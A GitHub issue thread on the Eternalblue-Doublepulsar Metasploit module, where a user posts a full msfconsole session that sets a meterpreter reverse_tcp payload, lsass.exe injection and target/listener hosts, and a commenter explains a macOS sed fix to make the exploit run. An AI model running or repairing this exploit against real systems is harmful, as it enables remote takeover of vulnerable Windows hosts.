Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.08k stars 519 forks source link

Issues on OSX #56

Open qt00tp opened 6 years ago

qt00tp commented 6 years ago

Hi it works on my kali, but gets problem on my OSX. I've changed the path in ruby file, but it still not work.

msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ doublepulsarpath => /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(eternalblue_doublepulsar) > set eternalbluepath /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ eternalbluepath => /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64 targetarchitecture => x64 msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe processinject => lsass.exe msf exploit(eternalblue_doublepulsar) > set winepath /Users/TT/.wine/drive_c/ winepath => /Users/TT/.wine/drive_c/ msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > set rhost 192.168.148.13 rhost => 192.168.148.13 msf exploit(eternalblue_doublepulsar) > set lhost 192.168.148.10 lhost => 192.168.148.10 msf exploit(eternalblue_doublepulsar) > run

[] Started reverse TCP handler on 192.168.148.10:4444 [] 192.168.148.13:445 - Generating Eternalblue XML data sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T [] 192.168.148.13:445 - Generating Doublepulsar XML data sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T [] 192.168.148.13:445 - Generating payload DLL for Doublepulsar [] 192.168.148.13:445 - Writing DLL in /Users/TT/.wine/drive_c/eternal11.dll [] 192.168.148.13:445 - Launching Eternalblue... NetworkTimeout: %TIMEOUT% could not be understood as a S16. TargetIp: %RHOST% is not a valid value. TargetPort: %RPORT% could not be understood as a TcpPort. Target: %TARGET% is not a valid value.

[-] 192.168.148.13:445 - Are you sure it's vulnerable? [*] 192.168.148.13:445 - Launching Doublepulsar... NetworkTimeout: %TIMEOUT% could not be understood as a S16. TargetIp: %RHOST% is not a valid value. TargetPort: %RPORT% could not be understood as a TcpPort. Architecture: %TARGETARCHITECTURE% is not a valid value. DllPayload: %DLLPAY% is not a valid value.

[-] 192.168.148.13:445 - Oops, something was wrong! [*] Exploit completed, but no session was created.

qt00tp commented 6 years ago

Can you please help me to figure this out ? Thanks.

ghost commented 6 years ago

Same issue here

Gembeltz commented 5 years ago

I also got the same problem how to fix it

7i11 commented 5 years ago

sed command is a bit different in macos, edit all sed calls into eternalblue_doublepulsar.rb and add an extension after -i argument, example: sed = `sed -i '.bak' 's/%RHOST%/#{datastore['RHOST']}/'

androidkillers commented 2 years ago

same issue here